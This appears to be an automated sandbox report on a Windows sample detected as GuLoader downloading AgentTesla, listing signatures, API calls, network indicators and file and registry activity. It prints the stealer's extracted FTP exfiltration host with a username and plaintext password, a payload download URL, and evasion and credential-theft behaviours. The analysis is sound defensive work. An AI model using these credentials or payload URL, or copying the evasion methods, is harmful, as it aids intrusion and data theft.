Windows Analysis Report
u9aPQQIwhj.exe

Overview

General Information

Sample name: u9aPQQIwhj.exe
renamed because original name is a hash value
Original sample name: 7bcd44c32c5d526659023b033c47e867068ae604484f85a21a4788cafe5b03e7.exe
Analysis ID: 1546022
MD5: 8b6b09811835191f99d4e2e9d94d232c
SHA1: 08edbf7da5b2e827978e178e5e49b45b5169d87c
SHA256: 7bcd44c32c5d526659023b033c47e867068ae604484f85a21a4788cafe5b03e7
Tags: exeSpam-ITAuser-JAMESWT_MHT
Infos:

Detection

AgentTesla, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected AgentTesla
Yara detected GuLoader
AI detected suspicious sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Agent Tesla, AgentTesla A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
 https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

AV Detection
barindex
Found malware configuration
Source: u9aPQQIwhj.exe.7880.4.memstrmin Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.concaribe.com", "Username": "testi@concaribe.com", "Password": "ro}UWgz#!38E"}
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.8% probability
Uses 32bit PE files
Source: u9aPQQIwhj.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:62131 version: TLS 1.2
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Code function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405770
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Code function: 0_2_0040622B FindFirstFileW,FindClose, 0_2_0040622B
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Code function: 0_2_0040276E FindFirstFileW, 0_2_0040276E
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Code function: 4_2_0040276E FindFirstFileW, 4_2_0040276E
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Code function: 4_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 4_2_00405770
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Code function: 4_2_0040622B FindFirstFileW,FindClose, 4_2_0040622B
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 192.185.13.234 192.185.13.234
Source: Joe Sandbox View IP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox View IP Address: 172.67.74.152 172.67.74.152
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
May check the online IP address of the machine
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:62115 -> 84.38.133.42:80
Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49730
Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:62004
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /SaclKvrenGmYaqCeKqHVn198.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 84.38.133.42Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /SaclKvrenGmYaqCeKqHVn198.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 84.38.133.42Cache-Control: no-cache
Source: global traffic DNS traffic detected: DNS query: api.ipify.org
Source: global traffic DNS traffic detected: DNS query: ftp.concaribe.com
Source: u9aPQQIwhj.exe, 00000004.00000002.2919270117.0000000005AB7000.00000004.00000020.00020000.00000000.sdmp, u9aPQQIwhj.exe, 00000004.00000002.2919240219.0000000005A80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://84.38.133.42/SaclKvrenGmYaqCeKqHVn198.bin
Source: u9aPQQIwhj.exe, 00000004.00000002.2919270117.0000000005AB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://84.38.133.42/SaclKvrenGmYaqCeKqHVn198.binY
Source: u9aPQQIwhj.exe, 00000004.00000002.2936520542.0000000035FDB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://concaribe.com
Source: u9aPQQIwhj.exe, 00000004.00000002.2937245380.0000000038B21000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoft
Source: u9aPQQIwhj.exe, 00000004.00000002.2936520542.0000000035FDB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ftp.concaribe.com
Source: u9aPQQIwhj.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: u9aPQQIwhj.exe, 00000004.00000002.2936520542.0000000035F61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: u9aPQQIwhj.exe, 00000004.00000002.2936520542.0000000035F61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org
Source: u9aPQQIwhj.exe, 00000004.00000002.2936520542.0000000035F61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org/
Source: u9aPQQIwhj.exe, 00000004.00000002.2936520542.0000000035F61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org/t
Source: u9aPQQIwhj.exe, 00000000.00000002.2410008030.0000000002763000.00000004.00000020.00020000.00000000.sdmp, nsw3DE5.tmp.0.dr, 660.jpg.0.dr String found in binary or memory: https://www.wikihow.com/Image:Type-Step-1-Version-6.jpg
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62131
Source: unknown Network traffic detected: HTTP traffic on port 62131 -> 443
Source: unknown HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:62131 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Code function: 0_2_004052D1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_004052D1
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process Stats: CPU usage > 49%
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Code function: 0_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,ExitProcess, 0_2_00403358
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Code function: 4_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,ExitProcess, 4_2_00403358
Detected potential crypto function
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Code function: 0_2_00404B0E 0_2_00404B0E
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Code function: 0_2_0040653D 0_2_0040653D
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Code function: 4_2_00404B0E 4_2_00404B0E
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Code function: 4_2_0040653D 4_2_0040653D
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Code function: 4_2_0015B21D 4_2_0015B21D
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Code function: 4_2_0015E360 4_2_0015E360
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Code function: 4_2_00154A58 4_2_00154A58
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Code function: 4_2_00153E40 4_2_00153E40
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Code function: 4_2_00154188 4_2_00154188
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Code function: 4_2_3889BB90 4_2_3889BB90
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Code function: 4_2_3889A7DC 4_2_3889A7DC
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Code function: 4_2_39043158 4_2_39043158
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Code function: 4_2_3904C240 4_2_3904C240
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Code function: 4_2_3904B2F0 4_2_3904B2F0
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Code function: 4_2_39047E40 4_2_39047E40
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Code function: 4_2_390456A0 4_2_390456A0
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Code function: 4_2_390466C0 4_2_390466C0
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Code function: 4_2_39040040 4_2_39040040
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Code function: 4_2_39042370 4_2_39042370
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Code function: 4_2_39045DB7 4_2_39045DB7
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Code function: 4_2_3904E468 4_2_3904E468
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Code function: 4_2_39047760 4_2_39047760
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Code function: 4_2_39412C51 4_2_39412C51
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Code function: 4_2_39040012 4_2_39040012
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Code function: String function: 00402B38 appears 47 times
Sample file is different than original file name gathered from version info
Source: u9aPQQIwhj.exe, 00000000.00000000.1653034165.0000000000454000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamekinglet.exe> vs u9aPQQIwhj.exe
Source: u9aPQQIwhj.exe, 00000004.00000002.2919270117.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs u9aPQQIwhj.exe
Source: u9aPQQIwhj.exe, 00000004.00000000.2407952768.0000000000454000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamekinglet.exe> vs u9aPQQIwhj.exe
Source: u9aPQQIwhj.exe, 00000004.00000002.2936077063.0000000035D09000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs u9aPQQIwhj.exe
Source: u9aPQQIwhj.exe Binary or memory string: OriginalFilenamekinglet.exe> vs u9aPQQIwhj.exe
Uses 32bit PE files
Source: u9aPQQIwhj.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/9@2/3
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Code function: 0_2_004045C8 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004045C8
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Code function: 0_2_0040206A LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk, 0_2_0040206A
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe File created: C:\Users\user\Uploadable Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Mutant created: NULL
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe File created: C:\Users\user\AppData\Local\Temp\nsg3DD4.tmp Jump to behavior
Source: u9aPQQIwhj.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe File read: C:\Users\user\Desktop\u9aPQQIwhj.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\u9aPQQIwhj.exe "C:\Users\user\Desktop\u9aPQQIwhj.exe"
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process created: C:\Users\user\Desktop\u9aPQQIwhj.exe "C:\Users\user\Desktop\u9aPQQIwhj.exe"
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process created: C:\Users\user\Desktop\u9aPQQIwhj.exe "C:\Users\user\Desktop\u9aPQQIwhj.exe" Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe File written: C:\Users\user\AppData\Local\Temp\Settings.ini Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles Jump to behavior

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: Process Memory Space: u9aPQQIwhj.exe PID: 7404, type: MEMORYSTR
Source: Yara match File source: 00000000.00000002.2410860650.0000000005FBA000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Code function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00406252
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Code function: 0_2_10002DB0 push eax; ret 0_2_10002DDE
Drops PE files
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe File created: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
